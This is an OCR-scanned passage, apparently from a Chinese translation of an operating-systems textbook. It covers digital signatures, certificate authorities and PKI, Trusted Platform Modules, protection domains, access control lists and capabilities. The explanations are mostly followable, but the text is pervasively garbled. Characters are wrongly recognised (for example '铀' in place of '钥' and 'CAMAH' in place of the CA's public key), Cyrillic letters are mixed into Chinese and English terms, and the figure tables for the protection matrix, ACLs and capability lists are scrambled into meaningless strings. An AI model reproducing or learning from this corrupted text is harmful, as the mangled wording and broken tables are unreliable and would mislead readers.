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图 9-3 a) 对 签名 块 进行 运算 ，b) 接收 方 获取 的 信息 
接收 方 收 到 文档 和 散 列 值 后 ， 首 先 使 用 事先 取得 一 致 的 MD5 或 SHA 算法 计算 文档 的 散 列 值 ， 然 后 
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接收 方 使 用 发 送 方 的 公 钥 对 签名 块 进行 运算 以 得 到 E(D(hash))。 这 实际 上 是 对 解密 后 的 散 列 进行 “加密”， 
操作 抵消 ， 以 恢复 原 有 的 散 列 。 如 果 计 算 后 的 散 列 值 与 签名 块 中 的 散 列 值 不 一 致 ， 则 表明 ， 要 么 文档 、 
要 么 签名 块 、 要 么 两 者 共同 被 复 改 过 (或 无 意 中 被 改动 )。 这 种 方法 仅仅 对 一 小 部 分 数据 ( 散 列 ) 运用 
了 (MORN) 公 和 铀 密码 体制 。 请 注意 这 种 方法 仅仅 对 所 有 满足 下 面条 件 的 x 起 作用 : 


E(D(x)) = х 
我 们 并 不 能 保证 所 有 的 加 密 函 数 都 拥有 这 种 属性 ， 因 为 我 们 原来 所 要 求 的 就 是 ， 
D(E(x)) = х 


在 这 里 ，E 是 加 密 函 数 ，D 是 解密 函数 。 而 为 了 满足 签名 的 要 求 ， 函数 运算 的 次 序 是 不 受 影响 的 。 
也 就 是 说 ，D 和 E 一 定 是 可 交换 的 函数 。 而 RSA 算 法 就 有 这 种 属性 。 

要 使 用 这 种 签名 机 制 ， 接 收 方 必须 知道 发 送 方 的 公 钥 。 有 些 用 户 在 其 Web 网 页 上 公开 他 们 的 公 钥 ， 
但 是 其 他 人 并 没有 这 么 做 ， 因 为 他 们 担心 人 侵 者 会 间 入 并 悄悄 地 改动 其 公 铀 。 对 他 们 来 说 ， 需 要 其 他 方 
法 来 发 布 公 钥 。 消 息 发 送 方 的 一 种 常用 方法 是 在 消息 后 附加 数字 证 书 ， 证 书 中 包含 了 用 户 姓名 、 公 钥 和 
可 信任 的 第 三 方 数字 签名 。 一 旦 用 户 获得 了 可 信 的 第 三 方 认证 的 公 钥 ， 那么 对 于 所 有 使 用 这 种 可 信 第 三 
方 确认 来 生成 自己 证 书 的 发 送 方 ， 该 用户 都 可 以 使 用 他 们 的 证 书 。 

认证 机 构 (Certification Authority, СА) 作为 可 信 的 第 三 方 ,提供 签名 证 书 。 然 而 如 果 用 户 要 验证 
有 CA 签名 的 证 书 ， 就 必须 得 到 CA 的 公 钥 ， 从 哪里 得 到 这 个 公 钥 ? 即使 得 到 了 用 户 又 如 何 确定 这 的 确 是 
CAMAH? 为 了 解决 上 述 两 个 问题 ， 需 要 一 套 完整 的 机 制 来 管理 公 钥 ， 这 套 机 制 叫 做 PKI (Public 
Key Infrastructure， 公 钥 基 础 设施 ) 。 网 络 浏览 器 已 经 通过 一 种 特别 的 方式 解决 了 这 个 问题 ， 所 有 的 浏览 
器 都 预 加 载 了 大 约 40 个 著名 CA 的 公 钥 。 

上 面 我 们 叙述 了 可 用 于 数字 证 书 的 公 钥 密码 体制 。 同 时 ， 我 们 也 有 必要 指出 不 包含 公 钥 体制 的 密码 
体系 同样 存在 。 


9.2.5 可 信 平 台 模 块 

加 密 算法 都 需要 密 钥 (Key) 。 如 果 密 钥 泄露 了 ， 所 有 基 于 该 密 钥 的 信息 也 等 同 于 泄露 了 ， 可 见 选 
择 一 种 安全 的 方法 存储 密 钥 是 必要 的 。 接 下 来 的 问题 是 ， 如 何在 不 安全 的 系统 中 安全 地 保存 密 钥 呢 ? 

有 一 种 方法 在 工业 上 已 经 被 采用 ， 该 方法 需要 用 到 一 种 叫做 可 信 平 台 模块 (Trusted Platform 
Modules, TPM) 的 芯片 。TPM 是 一 种 加 密 处 理 器 (сгуріоргосеѕѕог), 使 用 内 部 的 非 易 失 性 存储 介质 来 
保存 密 钥 。 该 芯片 用 硬件 实现 数据 的 加 密 /解密 操作 ， 其 效果 与 在 内 存 中 对 明文 块 进行 加 密 或 对 密 文 块 
进行 解密 的 效果 相同 ，TPM 同 时 还 可 以 验证 数字 签名 。 由 于 其 所 有 的 操作 都 是 通过 硬件 实现 ， 因 此 速度 
比 用 软件 实现 快 许多 ， 也 更 可 能 被 广泛 地 应 用 。 一 些 计算 机 已 经 安装 了 TPM 芯 片 ， 预 期 更 多 的 计算 机 会 
在 未 来 安装 。 

TPM 的 出 现 引发 了 很 多 争议 ， 因 为 不 同 厂商 、 机 构 对 于 谁 来 控制 TPM 和 它 用 来 保护 什么 有 分 歧 。 
微软 大 力 提倡 采用 TPM 芯 片 ， 并 且 为 此 开发 了 一 系列 应 用 于 TPM 的 技术 ， 包括 Palladium、NGSCB 以 及 
BitLocker。 微 软 的 观点 是 ， 由 操作 系统 控制 TPM 芯 片 ， 并 使 用 该 芯片 阻止 非 授权 软件 的 运行 。"“ 非 授权 
软件 ”可 以 是 盗版 (非法 复制 ) 软件 或 仅仅 是 没有 经 过 操作 系统 认证 的 软件 。 如 果 将 TPM 应 用 到 系统 启 
动 的 过 程 中 ， 则 计算 机 只 能 启动 经 过 内 置 于 TPM 的 密 钥 签名 的 操作 系统 ， 该 密 钥 由 TPM 生 产 商 提供 ， 该 
密 钥 只 会 透露 给 允许 被 安装 在 该 计算 机 上 的 操作 系统 的 生产 商 (如 微软 )。 因 此 ， 使 用 TPM 可 以 限制 用 
户 对 软件 的 选择 ， 用 户 或 许 只 能 选择 经 过 计算 机 生产 商 授权 的 软件 。 

由 于 TPM 可 以 用 于 防止 音乐 与 电影 的 盗版 ， 这 些 媒体 生产 商 对 该 芯片 表现 出 了 浓厚 的 兴趣 。TPM 
同样 开启 了 新 的 商业 模式 ， 如 “租借 ”歌曲 与 电影 。 TPM 通 过 检查 日 期 判断 当前 媒体 是 否 已 经 “过 期 ”， 
如 果 过 期 ， 则 拒绝 为 该 媒体 解码 。 

TPM 还 有 非常 广泛 的 应 用 领域 ， 而 这 些 领域 都 是 我 们 还 未 涉足 的 。 有 趣 的 是 ，TPM 并 不 能 提高 计 
算 机 在 应 对 外 部 攻击 中 的 安全 性 。 事 实 TPM 关 注 的 重点 是 采用 加 密 技术 来 阻止 用 户 做 任何 未 经 TPM 
控制 者 直接 或 间接 授权 的 事情 。 如 果 读者 想 了 解 更 多 关于 TPM 的 内 容 ， 在 Wikipedia 中 关于 可 信 计 算 
(Trusted Computing) 的 文献 可 能 会 对 你 有 所 帮助 。 
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9.3 保护 机 制 

如 果 有 一 个 清晰 的 模型 来 制定 哪些 事情 是 允许 做 的 ， 以 及 系统 的 哪些 资源 需要 保护 ， 那 么 实现 系统 
安全 将 会 简单 得 多 。 事 实 上 很 多 安全 方面 的 工作 都 是 试图 确定 这 些 问 题 ， 到 现在 为 止 我 们 也 只 是 浅 党 辑 
止 而 已 。 我 们 将 着 重 论述 几 个 有 普遍 性 的 模型 ， 以 及 增强 它们 的 机 制 。 


9.3.1 保护 域 

计算 机 系统 里 有 许多 需要 保护 的 “对 象 "。 这 些 对 象 可 以 是 硬件 (如 CPU、 内 存 段 、 磁 盘 驱 动 器 或 
打印 机 ) 或 软件 (如 进程 、 文 件 、 数 据 库 或 信号 量 

每 一 个 对 象 都 有 用 于 调用 的 单一 名 称 和 允许 进程 运行 的 有 限 的 一 系列 操作 。read 和 write 是 相对 广 
件 而 言 的 操作 ，up 和 down 是 相对 信号 量 而 言 的 操作 。 

显而易见 的 是 ， 我 们 需要 一 种 方法 来 禁止 进程 对 某 些 未 经 授权 的 对 象 进行 访问 。 而 且 这 样 的 机 制 必 
须 也 可 以 在 需要 的 时 候 使 得 受到 限制 的 进程 执行 某 些 合法 的 操作 子 集 。 如 进程 A 可 以 对 文件 F 有 读 的 权 
限 ， 但 没有 写 的 权限 。 

为 了 讨论 不 同 的 保护 机 制 ， 很 有 必要 介绍 一 下 域 的 概念 。 域 (domain) 是 一 对 (对象 ， 权 限 ) 组 合 。 
每 一 对 组 合 指定 一 个 对 象 和 一 些 可 在 其 上 运行 的 操作 子 集 。 这 里 权限 (right) 是 指 对 某 个 操作 的 执行 许可 。 
通常 域 相 当 于 单个 用 户 ， 告 诉 用 户 可 以 做 什么 不 可 以 做 什么 ， 当 然 有 时 域 的 范围 比 用 户 要 更 广 。 例如 ， 
一 组 为 某 个 项 目 编写 代码 的 人 员 可 能 都 属于 相同 的 一 个 域 ， 以 便于 他 们 都 有 权 读 写 与 该 项 目 相关 的 文件 。 

对 象 如 何 分 配给 域 由 需求 来 确定 。 一 个 最 基本 的 原则 就 是 最 低 权 限 原则 (Principle of Least 
Authority，POLA)， 一 般 而 言 ， 当 每 个 域 都 拥有 最 少数 量 的 对 象 和 满足 其 完成 工作 所 需 的 最 低 权限 时 ， 
安全 性 将 达到 最 好 。 

图 9-4 给 出 了 3 种 域 ， 每 一 个 域 里 都 有 一 些 对 
象 ， 每 一 个 对 象 都 有 些 不 同 的 权限 ( 读 、 写 、 执 
行 )。 请 注意 打印 机 1 同时 存在 于 两 个 域 中 ， 且 在 
每 个 域 中 具有 相同 的 权限 。 文 件 1 同样 出 现在 两 
个 域 中 ， 但 它 在 两 个 域 中 却 具有 不 同 的 权限 。 

任何 时 间 , 每 个 进程 会 在 某 个 保护 域 中 运行 。 图 9-4 三 个 保护 域 
换 句 话说 ， 进 程 可 以 访问 某 些 对 象 的 集合 ， 每 个 对 象 都 有 一 个 权限 集 。 进 程 运行 时 也 可 以 在 不 同 的 域 之 
间 切 换 。 域 切换 的 规则 很 大 程度 上 与 系统 有 关 。 

为 了 更 详细 地 了 解 域 ， 让 我 们 来 看 看 UNIX 系 统 (包括 Linux、FreeBSD 以 及 一 些 相似 的 系统 )。 在 
UNIX 中 ， 进 程 的 域 是 由 UID 和 GID 定 义 的 。 给 定 某 个 (UID，GID) 的 组 合 ， 就 能 够 得 到 可 以 访问 的 所 
有 对 象 列表 (文件 ， 包 括 由 特殊 文件 代表 的 IO 设备 等 ) ， 以 及 它们 是 否 可 以 读 ， 写 或 执行 。 使 用 相同 
(UID, GID) 组 合 的 两 个 进程 访问 的 是 完全 一 致 的 对 象 组 合 。 使 用 不 同 (UID, GID) 值 的 进程 访问 的 
是 不 同 的 文件 组 合 ， 虽 然 这 些 文件 有 大 量 的 重 枪 。 

而 且 ， 每 个 UNIX 的 进程 有 两 个 部 分 : 用 户 部 分 和 核心 部 分 。 当 执行 系统 调用 时 ， 进 程 从 用 户 部 分 
切换 到 核心 部 分 。 核 心 部 分 可 以 访问 与 用 户 部 分 不 同 的 对 象 集 。 例 如 ， 核 心 部 分 可 以 访问 所 有 物理 内 存 
的 页 面 、 整 个 磁盘 和 其 他 所 有 被 保护 的 资源 。 这 样 ， 系 统 调用 就 引发 了 域 切换 。 

当 进程 把 SETUID 或 SETGID 位 置 于 on 状态 时 可 以 对 文件 执行 exec 操 作 ， 这 时 进程 获得 了 新 的 有 效 
UID 或 GID。 不 同 的 (UID，GID) 组 合 会 产生 不 同 的 文件 和 操作 集 。 使 用 SETUID 或 SETOGID 运 行程 序 
也 是 一 种 域 切 换 ， 因 为 可 用 的 权限 改变 了 。 

一 个 很 重要 的 问题 是 系统 如 何 跟踪 并 确定 哪个 对 象 属于 哪个 域 。 从 概念 来 说 ， 至 少 可 以 预想 -个 大 
矩阵 ， 甜 阵 的 行 代表 域 ， 列 代表 对 象 。 每 个 方块 列 出 对 象 的 域 包含 的 、 可 能 有 的 权限 。 图 9-4 的 矩阵 如 
图 9-5 所 示 。 有 了 撼 阵 和 当前 的 域 编号 ， 系 统 就 能 够 判断 是 否 可 以 从 指定 的 域 以 特定 的 方式 访问 给 定 的 
对 象 。 

域 的 自我 切换 在 矩阵 模型 中 能 够 很 容易 实现 ， 可 以 通过 使 用 操作 enter 把 域 本 身 作为 对 象 。 图 9-6 再 
次 显示 了 图 9-5 的 矩阵 ， 只 不 过 把 3 个 域 当 作 了 对 象 本 身 。 域 1 中 的 进程 可 以 切换 到 域 ? 中 ， 但 是 一 日 切换 
后 就 不 能 返回 。 这 种 切换 方法 是 在 UNIX 里 通过 执行 SETUID 程 序 实现 的 。 不 允许 其 他 的 域 切 换 。 


$ 全 353 


对 象 
文件 | ”文件 2 文件 3 ”文件 4 文件 5 ”文件 6 ”打印 机 1 绘 仪 图 2 


Re 
1| Read | Веза | 
三 ЕЗ чы 
Ri а 
? aS | Eeese | Мне 
ЕЗ 
з Write Write Write 
Execute 
图 9-5 保护 矩阵 
对 象 
二 文件 1 文件 2 文件 3 文件 4 文件 5 文件 6 打印 机 1 绘 仪 图 2 йы 2 шз 
1| Roag | Boag Enter 
Read 
2 Read | Wae | Bead wie 
Read 
3 Wie | wie | wrie 
Execute 


图 9-6 将 域 作为 对 象 的 保护 矩阵 


9.3.2 访问 控制 列表 

在 实际 应 用 中 ， 很 少 会 存储 如 图 9-6 的 矩阵 ， 因 为 矩阵 太 大 、 太 稀疏 了 。 大 多 数 的 域 都 不 能 访问 大 
多 数 的 对 象 ， 所 以 存储 一 个 非常 大 的 、 几 乎 是 空 的 矩阵 浪费 空间 。 但 是 也 有 两 种 方法 是 可 行 的。 一 种 是 
按 行 或 技 列 存放 ， 而 仅仅 存放 非 空 的 元 素 。 这 两 种 方法 有 着 很 大 的 不 同 。 这 一 节 将 介绍 按 列 存放 的 方法 ， 
下 一 章节 再 介绍 按 行 存放 。 

第 一 种 方法 包括 一 个 关联 于 每 个 对 象 的 (有 序 ) 列表 里 ， 列 表 里 包含 了 所 有 可 访问 对 象 的 域 以 及 这 
些 域 如 何 访问 这 些 对 象 的 方法 。 这 一 列表 叫做 访问 控制 表 (Access Control List，ACL)， 如 图 9-7 所 示 。 
这 里 我 们 看 到 了 三 个 进程 ， 每 一 个 都 属于 不 同 的 域 。A、B 和 C 以 及 三 个 文件 E1、F2 和 F3。 为 了 简便 ， 
我 们 假设 每 个 域 相当 于 某 一 个 用 户 ， 即 用 户 A、B 和 C。 若 用 通常 的 安全 性 语言 表达 ， 用 户 被 叫做 主体 
(subjects 或 principals) ， 以 便 与 它们 所 拥有 的 对 象 如 文件 ) 区 分 开 来 。 


进程 
用 户 
空间 


加 一 [Ce єн] К 
B:RWX; C:RX 


图 9-7 用 访问 控制 表 管理 文件 的 访问 


每 个 文件 都 有 一 个 相关 联 的 ACL。 文 件 Fl 在 ACL 中 有 两 个 登录 项 (用 逗号 区 分 )。 第 一 个 登录 项 表 
示 任 何 用 户 A 拥有 的 进程 都 可 以 读 写 文件 。 第 二 个 登录 项 表示 任何 用 户 B 拥 有 的 进程 都 可 以 读 文件 。 所 
有 这 些 用 户 的 其 他 访问 和 其 他 用 户 的 任何 访问 都 被 禁止 。 请 注意 这 里 的 权限 是 用 户 赋予 的 ,而 不 是 进程。 
只 要 系统 运行 了 保护 机 制 ， 用 户 A 拥有 的 任何 进程 都 能 够 读 写 文件 F1。 系 统 并 不 在 平 是 否 有 1 个 还 是 100 
个 进程 。 所 关心 的 是 所 有 者 而 不 是 进程 ID。 


354 #9 


文件 F2 在 ACL 中 有 3 个 登录 项 : A、B 和 C。 它 们 都 可 以 读 文件 ， 而 且 B 还 可 以 写 文件 。 除 此 之 外 ， 不 
允许 其 他 的 访问 。 文 件 F3 很 明显 是 个 可 执行 文件 ， 因 为 B 和 C 都 可 以 读 并 执行 它 。B 也 可 以 执行 写 操作 。 

这 个 例子 展示 了 使 用 ACL 进 行 保护 的 最 基本 形式 。 在 实际 中 运用 的 形式 要 复杂 得 多 。 为 了 简便 起 见 ， 
我 们 目前 只 介绍 了 3 种 权限 : 读 、 写 和 执行 。 当 然 还 有 其 他 的 权限 。 有 些 是 一 般 的 权限 ， 可 以 运用 于 所 
有 的 对 象 ， 有 些 是 对 象 特 定 的 。 一 般 的 权限 有 destory object 和 copy object。 这 些 可 以 运用 于 任何 的 对 
象 ， 而 不 论 对 象 的 类 型 是 什么 。 与 对 象 有 关 的 特定 的 权限 会 包括 为 邮箱 对 象 的 append message 和 对 目 
录 对 象 的 sort alphabetically ( 按 字母 排序 ) 等 。 

到 目前 为 止 ， 我 们 的 ACL 登 录 项 是 针对 个 人 用 户 的 。 许 多 系统 也 支持 用 户 组 (group) 的 概念 。 组 
可 以 有 自己 的 名 字 并 包含 在 ACL 中 。 语 义学 上 组 的 变化 也 是 可 能 的 。 在 某 些 系统 中 ， 每 个 进程 除了 有 用 
PID (UID) 外 ， 还 有 组 ID (GID)。 在 这 类 系统 中 ， 一 个 ACL 登 录 项 包括 了 下 列 格式 的 登录 项 ， 

UID1, 6101: rights1，UID2，GID2: rights2, ... 

在 这 样 的 条 件 下 ， 当 出 现 要 求 访问 对 象 的 请 求 时 ， 必 须 使 用 调用 者 的 UID 和 GID 来 进行 检查 。 如 果 
它们 出 现在 ACL 中 ， 所 列 出 的 权限 就 是 可 行 的 。 如 果 (UID, GID) 的 组 合 不 在 列表 中 ， 访 问 就 被 拒绝 。 

使 用 组 的 方法 就 引入 了 角色 (role) 的 概念 。 如 在 某 次 系统 安装 后 ，Tana 是 系统 管理 员 ， 在 组 里 是 
sysadm, 但 是 假设 公司 里 也 有 很 多 为 员工 组 织 的 俱乐部 ， [一 文件 访问 控制 列表 
而 Tana 是 养 的 爱好 者 的 一 员 。 俱 乐 部 成 员 属于 pigfan 组 。 |Pacewors | tana, оу RW 
并 可 访问 公司 的 计算 机 来 管理 鸽子 的 数据 。 那 么 ACL 中 “|Pigeon_data bil, pigtan: RW; tana, pigfan: RW; .. 
的 一 部 分 会 如 图 9-8 所 示 。 ; 图 9-8 两 个 访问 控制 列表 

如 果 Tana 想 要 访问 这 些 文件 ， 那 么 访问 的 成 功 与 否 
将 取决 于 她 当前 所 登录 的 组 。 当 她 登录 的 时 候 ， 系 统 会 让 她 选择 想 使 用 的 组 ， 或 者 提供 不 同 的 登录 名 和 
密码 来 区 分 不 同 的 组 。 这 一 措施 的 目的 在 于 阻止 Tana 在 使 用 养 名 爱好 者 组 的 时 候 获 得 密码 文件 。 只 有 当 
她 登录 为 系统 管理 员 时 才 可 以 这 么 做 。 

在 有 些 情况 下 ， 用 户 可 以 访问 特定 的 文件 而 与 当前 登录 的 组 无 关 。 这 样 的 情况 将 引入 通配符 
(wildcard) 的 概念 ， 即 “任何 组 ”的 意思 。 如 ， 密 码 文件 的 登录 项 

tana, *, RW 
会 给 Tana 访 问 的 权限 而 不 管 她 的 当前 组 是 什么 。 

但 是 另 一 种 可 能 是 如 果 用 户 属于 任何 一 个 享有 特定 权限 的 组 ， 访 问 就 被 允许 。 这 种 方法 的 优点 是 ， 
属于 多 个 组 的 用 户 不 必 在 登录 时 指定 组 的 名 称 。 所 有 的 组 都 被 计算 在 内 。 同 时 它 的 缺点 是 几乎 没有 提供 
什么 封装 性 ，Tana 可 以 在 召开 养 镶 俱乐部 会 议 时 编辑 密码 文件 。 

组 和 通配符 的 使 用 使 得 系统 有 可 能 有 选择 地 阻止 用 户 访问 某 个 文件 。 如 ， 登 录 项 

virgil, *: (попе), *, *; RW 
给 Virgil 之 外 的 登录 项 以 读 写 文件 的 权限 。 上 述 方法 是 可 行 的 ， 因 为 登录 项 是 按 顺 序 扫描 的 ， 只 要 第 一 个 
被 采用 ， 后 续 的 登录 项 就 不 需要 再 检查 。 在 第 一 个 登录 项 中 为 Virgil 找 到 了 匹配 ， 然 后 找到 并 应 用 这 个 存 
取 权限 ， 在 本 例 中 为 (none)。 整 个 查找 在 这 时 就 中 断 了 。 实 际 上 ， 再 也 不 去 检查 剩 下 的 访问 权限 了 。 

还 有 一 种 处 理 组 用 户 的 方法 ， 无 须 使 用 包含 (UID, GID) 对 的 ACL 登 录 项 ， 而 是 让 每 个 登录 项 成 
为 UID 或 GID。 如 ， 一 个 进入 文件 pigeon_data 的 登录 项 是 : 

debbie; RW, phil; RW, pigfan; RW 
表示 debbie、phil 以 及 其 他 所 有 pigfan 组 里 的 成 员 都 可 以 读 写 该 文件 。 

有 时 候 也 会 发 生 这 样 的 情况 ， 即 一 个 用 户 或 组 对 特定 文件 有 特定 的 许可 权 ， 但 文件 的 所 有 者 稍 后 又 
会 收回 。 通 过 访问 控制 列表 ， 收 回 过 去 赋予 的 访问 权 相 对 比较 简单 。 这 只 要 编辑 ACL 就 可 以 修改 了 。 但 
是 如 果 ACL 仅 仅 在 打开 某 个 文件 时 才 会 检查 ， 那 么 改变 它 以 后 的 结果 就 只 有 在 将 来 调用 open 命 令 时 才能 
奏效 。 对 于 已 经 打开 的 文件 ， 就 会 仍然 持 有 原来 打开 时 拥有 的 权限 ， 即 使 用 户 已 经 不 再 具有 这 样 的 权限 。 


9.3.3 权能 
另 一 种 切 分 图 9-6 和 矩阵 的 方法 是 按 行 存储 。 在 使 用 这 种 方法 的 时 候 ， 与 每 个 进程 关联 的 是 可 访问 的 
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对 象 列 表 ， 以 及 每 个 对 象 上 可 执行 操作 的 指示 。 这 一 栏 叫做 权能 字 列 表 (capability list 或 C-list) ， 而 且 
每 个 单独 的 项 目 叫 做 权能 字 (Dennis 和 Van Horn, 1966, Fabry, 1974)。 一 个 3 进程 集 和 它们 的 权能 字 列 


表 如 图 9-9 所 示 。 
进程 у" © 


空间 
п т 3 
F1 FER [ER FZR 
[е] F2:R Fz:Rw F3:RX 内 核 
т Ё 
[F] F3: A 空间 
权能 字 列 表 


图 9-9 在 使 用 权能 字 时 ， 每 个 进程 都 有 一 个 权能 字 列 表 


每 一 个 权能 字 赋 予 所 有 者 针对 特定 对 象 的 权限 。 如 在 图 9-9 中 ， 用 户 A 所 拥有 的 进程 可 以 读 文 件 F1 
和 F2。 一 个 权能 字 通 常 包含 了 文件 (或 者 更 一 般 的 情况 下 是 一 个 对 象 ) 的 标识 符 和 用 于 不 同 权 限 的 位 图 。 
在 类 似 UNIX 的 系统 中 ， 文 件 标识 符 可 能 是 i 节 点 号 。 权 能 字 列 表 本 身 也 是 对 象 ， 也 可 以 从 其 他 权能 字 列 
表 处 指定 ， 这 样 就 有 助 于 共享 子 域 。 

很 明显 权能 字 列 表 必 须 防止 用 户 进行 自 改 。 已 知 的 保护 方法 有 三 种 。 第 一 种 方法 需要 建立 带 标记 的 
体系 结构 tagged architecture) ， 在 这 种 硬件 设计 中 ， 每 个 内 存 字 节 必 须 拥有 额外 的 位 (或 标记 ) 来 判 
断 该 字 节 是 否 包含 了 权限 字 。 标 记 位 不 能 被 算术 、 比 较 或 相似 的 指令 使 用 ， 它 仅 可 以 被 在 核心 态 下 运行 
的 程序 修改 (如 操作 系统 )。 人 们 已 经 构造 了 带 标记 体系 结构 的 计算 机 ， 并 可 以 稳定 地 运行 (Feustal， 
1972), 1ВМ AS/400 就 是 一 个 公认 的 例子 。 

第 二 种 方法 是 在 操作 系统 里 保存 权能 字 列 表 。 随 后 根据 权能 字 在 列表 中 的 位 置 引用 权能 字 。 某 个 进 
程 也 许 会 说 ;“ 从 权能 字 2 所 指向 的 文件 中 读 取 1KB”。 这 种 寻 址 方法 有 些 类 似 UNIX 里 的 文件 描述 符 。 
Hydra (Wulf 等 人 ，1974) 采用 的 就 是 这 种 方法 。 

第 三 种 方法 是 把 权能 字 列 表 放 在 用 户 空间 里 ， 并 用 加 密 方法 进行 管理 ， 这 样 用 户 就 不 能 自 改 它们 。 
这 种 方法 特别 适合 分 布 式 操作 系统 ， 并 可 按 下 述 的 方式 工作 。 当 客户 进程 发 送 消息 到 远程 服务 器 (如 一 
台 文件 服务 器 ) 时 ， 请 求 为 自己 创建 一 个 对 象 时 ， 服 务 器 会 在 创建 对 象 的 同时 创建 一 条 长 随机 码 作为 校 
验 字段 附 在 该 对 象 上 。 文 件 服务 器 为 对 象 预 留 了 模 口 ， 以 便 存放 校 验 字段 和 磁盘 扁 区 地 址 等 。 在 UNIX 
术语 中 ， 校 验 字段 被 存放 在 服务 器 的 i 节 点 中 。 校 验 字段 不 会 返回 用 户 ， 也 决 不 会 被 放 在 网 络 上 。 服 务 
器 会 生成 并 回 送 给 用 户 如 图 9-10 格 - 
Жыкы: ТТ | вв | лов. вж. ва 


返回 给 用 户 的 权能 字 包 括 服 7 
务 器 的 标识 符 、 对 象 号 (服务 器 очо 深 用 了 密码 保护 的 权能 字 
列表 索引 ， 主 要 是 inode 码 ) 以 及 以 位 图 形式 存放 的 权限 。 对 一 个 新 建 的 对 象 来 说 ， 所 有 的 权限 位 都 是 
处 于 打开 状态 的 ， 这 显然 是 因为 该 对 象 的 拥有 者 有 权限 对 该 对 象 做 任何 事情 。 最 后 的 字段 包含 了 对 象 、 
权限 以 及 校 验 字段 。 校 验 字 段 运行 在 通过 密码 体制 保护 的 单 向 函数 / 上 ， 我 们 已 经 讨论 过 这 种 函数 。 

当 用 户 想 访问 对 象 时 ， 首 先 要 把 权能 字 作 为 发 送 请 求 的 一 部 分 传送 到 服务 器 。 然 后 服务 器 提取 对 象 
编号 并 通过 服务 器 列表 索引 找到 对 象 。 再 计算 / 对象， 权限 ， 校 验 )。 前 两 个 参数 米 自 于 权能 字 本 身 ， 而 
第 三 个 参数 来 自 于 服务 器 表 。 如 果 计算 值 符合 权能 字 的 第 四 个 字段 ， 请 求 就 被 接受 ， 否 则 被 拒绝 。 如 果 
用 户 想 要 访问 其 他 人 的 对 象 ， 他 就 不 能 伪造 第 四 个 域 的 值 ， 因 为 他 不 知道 术 验 字段 ， 所 以 请 求 将 被 拒绝 。 

用 户 可 以 要 求 服务 器 建立 一 个 较 弱 的 权能 字 ， 如 只 读 访问 。 服 务 器 首先 检查 权能 字 的 合法 性 ， 检 查 
成 功 则 计算 f (对 象 ， 新 的 权限 ， 校 验 ) 并 产生 新 的 权能 字 放 入 第 四 个 字段 中 。 请 注意 原来 的 校 验 值 仍 
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在 使 用 ， 因 为 其 他 较 强 的 权能 字 仍然 需要 该 校 验 值 。 

新 的 权能 字 被 被 发 送 回 请 求 进程 。 现 在 用 户 可 以 在 消息 中 附加 该 权能 字 发 送 到 朋友 处 。 如 果 朋 友 打 
开 了 应 该 被 关闭 的 权限 位 ， 服 务 器 就 会 在 使 用 权限 字 时 检测 到 ， 因 为 f 的 值 与 错误 的 权限 位 不 能 对 应 。 
既然 朋友 不 知道 真正 的 校 验 字段 ， 他 就 不 能 伪造 与 错误 的 权限 位 相对 应 的 权能 字 。 这 种 方法 最 早 是 由 
Amoeba 系 统 开发 的 ， 后 被 广泛 使 用 (Tanenbaum 等 人 , 1990), 

除了 特定 的 与 对 象 相关 的 权限 (如 读 和 执行 操作 ) 外 ,权能 字 中 (包括 在 核心 态 和 密码 保护 模式 下 ) 
通常 包含 一 些 可 用 于 所 有 对 象 的 普通 权限 。 这 些 普通 权限 有 : 

1) 复制 权能 字 : 为 同一 个 对 象 创建 新 的 权能 字 。 

2) 复制 对 象 : 用 新 的 权能 字 创 建 对 象 的 副本 。 

З) 移 除权 能 字 : 从 权能 字 列表 中 删 去 登录 项 ， 不 影响 对 象 。 

4) 销毁 对 象 : 永久 性 地 移 除 对 象 和 权能 字 。 

最 后 值得 说 明 的 是 ， 在 核心 管理 的 权能 子 系统 中 ， 撤 回 对 对 象 的 访问 是 十 分 困难 的 。 系 统 很 难为 任意 
对 象 找到 它 所 有 显著 的 权能 字 并 撤回 ， 因 为 它们 存储 在 磁盘 各 处 的 权能 字 列 表 中 。 一 种 办 法 是 把 每 个 权能 
字 指 向 间接 的 对 象 ， 而 不 是 对 象 本 身 。 再 把 间接 对 象 指向 真正 的 对 象 ， 这 样 系统 就 能 打 断 连接 关系 使 权能 
字 无 效 。( 当 指向 间接 对 象 的 权能 字 后 来 出 现在 系统 中 时 ， 用 户 将 发 现 间接 对 象 指向 的 是 一 个 空 的 对 象 。) 

在 Amoeba 系 统 结构 中 ， 撤 加 权能 字 是 十 分 容易 的 。 要 做 的 仅仅 是 改变 存放 在 对 象 里 的 校 验 字段 。 
只 要 改变 一 次 就 可 以 使 所 有 的 失效 。 但 是 没有 一 种 机 制 可 以 有 选择 性 地 撤回 权能 字 ， 如 ， 仅 撤回 John 的 
许可 权 ， 但 不 撤回 任何 其 他 人 的 。 这 一 缺陷 也 被 认为 是 权限 系统 的 一 个 主要 问题 。 

另 一 个 主要 问题 是 确保 合法 权能 字 的 拥有 者 不 会 给 他 最 好 的 朋友 1000 个 副本 。 采 用 核心 管理 权能 字 
的 模式 ， 如 Hydra 系 统 ， 这 个 问题 得 到 解决 。 但 在 如 Amoeba 这 样 的 分 布 式 系统 中 却 无 法 解决 这 个 问题 。 

另 一 方面 ， 权 能 字 非 常 漂亮 地 解决 了 移动 代码 的 沙 盒 问题 。 当 外 来 程序 开始 运行 时 ， 给 出 的 s 


列表 里 只 包含 了 机 器 所 有 者 想 要 给 的 权能 ， 如 在 屏幕 上 进行 写 操作 以 及 在 刚 创建 的 临时 目录 里 X 
的 权利 。 如 果 移 动 代码 被 放 进 了 自己 的 只 拥有 这 些 有 限 权能 的 进程 中 ， 就 无 法 访问 其 他 任何 资源 ， 相 当 
于 被 有 效 地 限制 在 了 沙 盒 里 。 这 种 方法 不 需要 修改 代码 ， 也 不 需要 解释 性 执行 。 当 运行 的 代码 拥有 所 需 
的 最 少 访问 权时 ， 符 合 了 最 小 特权 规则 ， 这 也 是 建立 安全 操作 系统 的 方针 。 

总 之 ，ACL 和 权能 字 具 有 一 些 彼此 互补 的 特性 。 权 能 字 相 对 来 说 效率 较 高 ， 因 为 进程 在 要 求 “ 打 开 由 
权能 字 3 所 指向 的 文件 ”时 无 须 任何 检查 。 而 采用 ACL 时 需要 一 些 查验 操作 (时 间 可 能 很 长 )。 如 果 系 统 不 
支持 用 户 组 的 话 ， 赋 予 每 个 用 户 读 文 件 的 权限 就 需要 在 ACL 中 列举 所 有 的 用 户 。 权 能 字 还 可 以 十 分 容易 地 
封装 进程 ， 而 ACL 却 不 能 。 另 一 方面 ，ACL 支 持 有 选择 地 撤回 权限 ， 而 权能 字 不 行 。 最 后 ， 如 果 对 象 被 出 
